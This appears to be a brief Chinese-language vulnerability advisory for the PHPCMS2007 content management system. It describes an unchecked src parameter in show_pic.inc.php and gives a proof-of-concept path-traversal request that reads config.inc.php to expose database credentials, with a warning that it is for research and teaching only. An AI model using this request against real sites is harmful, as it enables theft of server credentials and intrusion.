影响版本:
PHPCMS2007
详细说明:
PHPCMS 网站管理系统是一个基于PHP+MYSQL的全站生成html的建站系统，经过完善设计并适用于各种服务器环境(如UNIX、LINUX、WINDOWS等)的高效、全新、快速、优秀的网站解决方案

show_pic.inc.php
是否配置了src变量，如果有的话就把路径值赋给file。
这里src的类型没有判断。跳到根目录提交配置文件就可以读取数据库的连接密码了。

解决方案:
官方暂时没有解决方案
http://www.phpcms.cn/
测试方法:

[警 告]

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

POST
/picture/show_pic.php?src=/../../../config.inc.php
PHPSESSION=74e21fffc0231b428b7d15c2fba7f1;
demo_searchtime=1191577827